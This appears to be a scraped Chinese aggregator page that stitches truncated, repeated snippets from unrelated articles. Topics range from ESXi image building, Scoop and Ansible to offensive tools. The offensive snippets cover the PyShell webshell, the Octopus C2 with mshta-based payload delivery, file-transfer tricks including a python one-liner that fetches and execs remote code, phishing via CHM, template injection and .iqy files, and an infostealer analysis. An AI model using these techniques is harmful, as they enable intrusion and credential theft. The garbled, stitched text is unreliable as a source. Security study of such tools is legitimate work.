与此同时,PyShell还提供了完整的命令执行历史记录、文件上传和下载,设置还可以允许我们像使用标准Shell一样进行各种文件系统间的切换。...工具要求 首先,该工具基于Python 3开发,因此我们需要在本地设备上安装并配置好Python 3环境。接下来,使用该项目提供的requirements.txt安装该工具所需的依赖组件。...工具安装 我们建议广大研究人员直接使用下列命令将该项目源码克隆至本地,或直接下载该项目的【Zip文件】: git clone https://github.com/JoelGMSec/PyShell...-su, --sudo Sudo命令执行(仅适用Linux主机) -ps, --PowerShell PowerShell命令执行(仅适用Windows...我们还可以使用文件上传功能: 或者下载文件: 许可证协议 本项目的开发与发布遵循GNU v3.0开源许可证协议。
获取相关软件包 在授权申请完成之后,我们就可以从官网网站下载 ESXi 的软件包了。...,将文件保存为“VMware-ESXi-7.0U2a-17867351-depot.zip”,等待使用。...将文件保存为“Net-Community-Driver_1.2.0.0-1vmw.700.1.0.15843807_18028830.zip” ,等待使用。...所以,这里我们需要一台标准的 Windows 系统环境,来运行 PowerShell ,进行镜像构建。...首先获取 PowerShell 的模块路径,然后将下载的 PowerCLI 压缩包放置模块目录,并进行解压缩。
执行系统命令。 下载文件。 加载外部Powershell模块。 在C2和代理之间使用加密的通道(AES-256)。 使用不起眼的技术执行命令并传输结果。...您可以编辑文件profile.py 以开始构建自己的配置文件,其中包含以下主要URL: file_receiver_url:处理文件下载。 report_url:处理ESA报告。...加载外部Powershell模块。 从目标计算机下载文件。...您还可以将Powershell模块加载到Octopus中以在攻击过程中为您提供帮助,您只需要将要使用的模块复制到“模块”目录中,然后在与代理进行交互时执行“load module_name”以直接加载模块...您可以使用Octopus从目标计算机上下载文件,只需执行“ download file_path”即可下载文件。 这里不再演示。 觉得不错,点个在看,谢谢大家。
获取相关软件包 在授权申请完成之后,我们就可以从官网网站下载 ESXi 的软件包了。 ?...,将文件保存为“VMware-ESXi-7.0U2a-17867351-depot.zip”,等待使用。...将文件保存为“Net-Community-Driver_1.2.0.0-1vmw.700.1.0.15843807_18028830.zip” ,等待使用。 ?...所以,这里我们需要一台标准的 Windows 系统环境,来运行 PowerShell ,进行镜像构建。 ?...首先获取 PowerShell 的模块路径,然后将下载的 PowerCLI 压缩包放置模块目录,并进行解压缩。
Octopus中的一项很酷的功能称为ESA,它表示“端点态势感知”,它将收集有关目标的一些重要信息,这些信息将帮助您更好地了解您在操作过程中将面对的目标网络端点。您可以根据此信息自定义您的实际操作。...0x01安装 使用以下命令就可直接把代码从github上下载到本地,我这里网络问题,我直接传了一份到kali上了(需要代码可github下载或后台回复006) git clone https://github.com...载荷(前提是需要一个监听器) powershell单行代码将使您能够生成powershell命令,该命令可直接从C2下载并执行有效负载。...由于使用了@ahmedkhlief,他可以重用APT34威胁组中的代码,该威胁组从C2下载HTA文件内容并使用mshta.exe受信任的Windows二进制文件运行,以获取最终的Powershell代理已执行...Octopus使用一种称为“非托管Powershell”的技术来执行powershell脚本,而无需接触powershell.exe二进制文件,这可以帮助您避免对powershell.exe的任何限制。
(小白的方法,有其他好办法,希望前辈们赐教) 两种安装过程 本文提供两种安装过程, 第一种是博主在网络中搜索到的,也是目前搜索结果最多的:下载各种EXE安装文件一路下一步。...但是最新版本只提供了zip或gz打包的源码,需要编译之后才能用,这可苦了我们新手了,编译是什么鬼!...然后就卡在怎么编译了的有没有啊,其实pyqt5的安装提供了一个非常方便的方式了,通过pip包从Python的pypi仓库下载代码。...-17.04.1.zip 把它解压到任意文件夹 通过管理员权限的windows PowerShell访问这个文件夹,并运行install.py PS C:\Windows\system32> cd...,希望能够帮助到和博主一样的新同学能够顺利的安装最新版本的Eric。
当我们完成了“工具镜像”的下载后,还需要准备(下载)两类“做饭的素材”: •ESXi 的离线安装包,比如:“VMware-ESXi-8.0-20513097-depot.zip”,获取方式:•在上文中的...社区网络驱动程序:usb-network-native-driver-for-esxi[9]•ESXi 的 NVMe 社区驱动程序:community-nvme-driver-for-esxi[10] 将下载好的文件放置在当前目录...接下来,我们就能够使用下面的命令,来添加基础镜像,和我们要附加到 ESXi 镜像中的驱动了(命令中的文件名根据下载的文件名进行适当调整): # 加载基础镜像 Add-EsxSoftwareDepot /...下面记录下制作这个镜像工具的过程,希望能够帮助到“后来的人”。比如,如果 ESXi 出新版了,工具需要升级,而我恰好没有时间折腾。...FROM python:3.7 接着,先来安装需要的 Python 依赖软件包: RUN pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn
0x01 Linux 2.1 Wget 这款工具功能很丰富,可以充当某种功能完备的GUI下载管理器,它拥有一款理想的下载管理器所需要的所有功能,比如它可以恢复下载,可以下载多个文件,出现某个连接问题后,...目标电脑上的命令: nc host_ip 1234 > file 这条命令将连接源电脑,接受file内容保存。...下面这两条指令实现了从Internet网络下载一个文件。...下面的代码可以实现下载文件,虽然它的长度比Powershell长多了。...C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read(
当我们完成了“工具镜像”的下载后,还需要准备(下载)两类“做饭的素材”: ESXi 的离线安装包,比如:“VMware-ESXi-8.0-20513097-depot.zip”,获取方式: - 在上文中的...USB 社区网络驱动程序:usb-network-native-driver-for-esxi - ESXi 的 NVMe 社区驱动程序:community-nvme-driver-for-esxi 将下载好的文件放置在当前目录...接下来,我们就能够使用下面的命令,来添加基础镜像,和我们要附加到 ESXi 镜像中的驱动了(命令中的文件名根据下载的文件名进行适当调整): # 加载基础镜像 Add-EsxSoftwareDepot /...下面记录下制作这个镜像工具的过程,希望能够帮助到“后来的人”。比如,如果 ESXi 出新版了,工具需要升级,而我恰好没有时间折腾。...FROM python:3.7 接着,先来安装需要的 Python 依赖软件包: RUN pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn
正如其他配置管理工具一样,Ansible 可以帮助我们完成一些批量任务,或者完成一些需要经常重复的工作 比如:同时在 100 台服务器上安装 nginx 服务,并在安装后启动它们 比如:将某个文件一次性拷贝到...远程主机开启 Winrm 服务 升级 Upgrading PowerShell 和 .NET Framework 可以使用 Upgrade-PowerShell.ps1 脚本来更新它们 这是如何从PowerShell...如果需要重新启动 username 并且 password 已设置和参数,则脚本将从重新启动后自动重新启动并登录。该脚本将继续执行,直到不需要其他操作并且PowerShell版本与目标版本匹配为止。..., $file) powershell.exe -ExecutionPolicy ByPass -File $file -Verbose WinRM 安装程序 一旦将 Powershell 升级到至少3.0...&更新程序------------------------ - name: 下载 server 程序文件 win_get_url: url: "{{package.root_url
安装scoop scoop安装非常简单,无需UAC,打开powershell输入下面命令即可。...默认情况下scoop只启用了main bucket,里面只包含了一些最常用的命令行程序,如果你想安装其他程序,需要手动添加一下bucket。...如果软件同时支持两种那么就可以像上面这样分别设置两个版本的文件地址和哈希值。 url,下载包的地址,如果是zip、7z、tar.gz等格式,scoop会自动解压压缩包。...当然为了能够比较方便的获取文件校验码,我甚至还额外编写了一个powershell脚本,来下载并获取压缩包校验值。脚本会输出成JSON片段文件,可以直接复制粘贴到上面的JSON中。...$hash64""" Remove-Item -Path $gost32file, $gost64file 有了清单文件,就可以使用scoop安装gost了,既可以从本地的清单文件安装,也可以从远程的清单文件安装
平台上有很多靶机,从易到难,黑客每入侵一台机器都会获得相应积分,通过积分排名设有名人堂。今天要实验的是靶机Access。 ? 一.获取普通用户权限 首先我们用nmap探测下靶机的信息。...我们去看下刚刚从FTP下载来的文件,先解压Engineer目录下的Access Control.Zip文件。 ? 发生了一个错误,还7z来进行解压。...7z x Access\ Control.zip ? 发现ZIP是需要密码的,随便输入个密码报错,我们用7z 的l命令下的slt命令。...7z l -slt Access\ Control.zip 参数说明: l:用于显示压缩文件的信息 Slt:属于l下的子命令用来显示压缩文件的技术信息 ?...接着用python开启HTTP服务器 ? 然后在目标靶机telnet上执行这段代码,就是远程执行powershell脚本。
,您还可以通过为您的域提供有效的证书并配置Octopus C2服务器以使用它来选择使用SSL/TLS 功能特性 Octopus具有许多功能,可让您在部署实际需要的军械库、工具和技术之前了解可能会涉及到的点有哪些...,例如: 下载文件 执行系统命令 通过HTTP/S控制代理 加载外部Powershell模块 在C2和代理之间使用加密的通道(AES-256) 使用不起眼的技术执行命令并传输结果 为每个目标创建自定义侦听器和多个侦听器...Profile设置 在开始使用Octopus之前,您必须设置一个URL处理配置文件,该配置文件将控制C2的行为和功能,因为Octopus是基于HTTP的C2,因此它依赖于URL来处理连接并确保URL不会用作...profile.py文件包含许多关键变量: file_receiver_url:处理文件下载 report_url:处理ESA报告 command_send_url:处理将发送到目标的命令 command_receiver_url...: 同时您可以使用Octopus从目标计算机上下载文件,只需执行“ download file_path”即可下载文件 HTA oneliner 要为listener1生成HTA oneliner,
; debug使用思路:把需要上传的exe转换成十六进制hex的形式,通过echo命令将hex代码写入文件,使用debug功能将hex代码还原出exe文件。...注意事项: Debug在Win7以上不自带了需要去官网下载DOSBox程序与debug.exe程序; ?...GET下载文件 BIN 在上传和下载文件使用 ?...tcharron/wgetwin-1_5_3_1-binary.zip C:\test\update\wget.zip 运行后会下载wget的压缩包wget.zip 注:Windows系统默认不包含解压缩...zip文件的命令,但是可以通过vbs来实现解压缩zip文件 vbs实现解压缩,以下代码保存为.vbs文件: UnZip "C:\test\update\wget.zip","C:\test\update
; debug使用思路:把需要上传的exe转换成十六进制hex的形式,通过echo命令将hex代码写入文件,使用debug功能将hex代码还原出exe文件。...注意事项: Debug在Win7以上不自带了需要去官网下载DOSBox程序与debug.exe程序; WeiyiGeek. (2) FTP 描述:搭建好ftp服务器利用文本记录FTP命令进行下载常用参数...') 使用 powershell 脚本上传 psexec.exe 到目标机器 #方式1 echo $client = New-Object System.Net.WebClient > script.ps1...tcharron/wgetwin-1_5_3_1-binary.zip C:\test\update\wget.zip 运行后会下载wget的压缩包wget.zip 注:Windows系统默认不包含解压缩...zip文件的命令,但是可以通过vbs来实现解压缩zip文件 vbs实现解压缩,以下代码保存为.vbs文件: UnZip "C:\test\update\wget.zip","C:\test\update
但在后台,Powershell 代码会使用 Invoke-WebRequest 从新注册的恶意域名(vuagame[.]store)下载多个文件。...率先下载的两个 ZIP 文件(Document.zip 与 4HAI.zip)会被存储在 C:\Users\Public 文件夹中。...4HAI.zip文件中包含另一个要复制到启动文件夹的恶意批处理脚本,该脚本会运行 PowerShell 代码并下载执行名为 project.py 的 Python 脚本。...与之前的批处理脚本一样,也需要更改编码才能正常查看该脚本。 将批处理脚本复制到启动文件夹后,将会下载并执行另一个名为 rmv.py 的 Python 脚本清除痕迹。...被窃的凭据与浏览器 Cookie 启动文件夹中的恶意 Python 脚本将嵌入的十六进制编码数据转换为二进制。这部分数据被压缩了多次,可能是为了逃避检测。
当受害者双击之后就会自动执行我们的恶意payload,从目标网站下载并执行。 最终被得到 shell。...1.4 CHM CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。...文档的URL 将DOCX解压后的内容再以存储模式压缩为ZIP 修改后缀名为DOCX,打开后即可实现远程注入宏文档 按照上述Word宏钓鱼方法制作,保存时保存类型为 dotm , fish.dotm, 开启...Web服务,放在其目录下, http://192.168.2.148:8000/hello.doc 制作 docx 直接下载份简历 将下载的简历文件后缀 docx 改为 zip,解压....\Out-WebQuery.ps1";Out-WebQuery -URL http://192.168.2.148:8000/msf.html}" 命令成功执行后,会生成一个iqy文件 接下来,打开Web
这次我的目标是将PowerShell美化成下面这样,并在命令提示符中加入Emoji表情。...当然,你也可以去python官网上下载安装包后进行安装~ 而在后续使用pip命令的过程中,经常会出现如下提示: You are using pip version 19.0.3, however version...windows下安装Fira code字体的方法为: 下载 FiraCode, 地址为: https://github.com/tonsky/FiraCode/releases 复制相应的ttf 文件到...参看微软官方文档中的策略管理方式,只需在以管理员权限打开的powershell中这么执行指令: Get-ExecutionPolicy -List 此时,我们需要输入以下命令,将CurrentUser的...首先,使用上面的地址将 ColorTool 下载至本地,并解压 打开Windows terminal的Powershell Tab ColorTool 使用非常简单,该工具自带了几种配色主题,我们可以利用下面这个命令进行查看
0x01 下载XRay XRay为单文件二进制文件,无依赖,也无需安装,下载后直接使用。笔者建议使用XRay社区下载,速度较之GitHub更快。.../xray/releases 0x02 XRay基础命令 #为方便使用,笔者将 xray_windows_amd64.exe 改名为xray.exe #为方便使用,笔者在xray.exe所在目录放置了一个...bat文件,内容为start Powershell #注:Windows中使用,建议使用Powershell运行XRay,其命令格式....URL地址 --json-output #将结果输出到一个json文件 #基础参数 -genca #生成一个根证书,主要用于被动代理扫描https流量时 -version...#查看xray的版本信息 -help #显示命令或帮助列表 3、生成CA证书 .
您可以在trustedsec.com上详细查看该软件,也可以从GitHub下载该软件,或者使用以下链接下载:https://github.com/trustedsec/unicorn 一旦你下载了magic...创建文件后,打开python服务器,通过输入以下内容将文件共享到受害者的PC: python -m SimpleHTTPServer 80 输入以下命令运行上述文件: mshta.exe http:192.168.1.109...它只是基于python的PowerShell windows代理,这使得它非常有用。...您可以从https://github.com/EmpireProject/Empire下载此框架。...需要注意的主要问题是我们在cactustorch中使用的代码是通过msfvenom创建的,然后编码到Base64中,因为它只支持它。 所以,首先让我们创建我们的恶意软件,然后加密它。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
